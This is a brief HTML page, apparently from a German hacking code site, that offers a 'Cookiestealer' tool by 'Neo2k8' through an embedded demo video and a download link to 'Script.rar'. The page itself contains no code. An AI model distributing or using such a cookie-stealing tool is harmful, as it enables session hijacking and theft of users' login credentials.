<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="generator" content=
"HTML Tidy for Windows (vers 14 February 2006), see www.w3.org" />
<meta http-equiv="Content-Type" content=
"text/html; charset=us-ascii" />
<title>Cookiestealer</title>
<link rel="stylesheet" href="../../../css/code.css" type=
"text/css" />
</head>
<body>
<hr />
<pre>
<b>[+]</b><u>Topic: Code</u>
<b>[+]</b><u>Von: Neo2k8</u>
<b>[+]</b><u>Return: <a href=
"javascript:history.back()">Code</a></u>
</pre>
<hr />
<pre>
<embed src="Cookiestealer.avi" width="400" height="300" hidden="false" autostart="false" loop="true"></embed>
<noembed>Videoshow leider nicht verf&uuml;gbar!</noembed>
</pre>
<hr />
<pre>
Package: <a href="Script.rar">Cookiestealer</a>
</pre>
</body>
</html>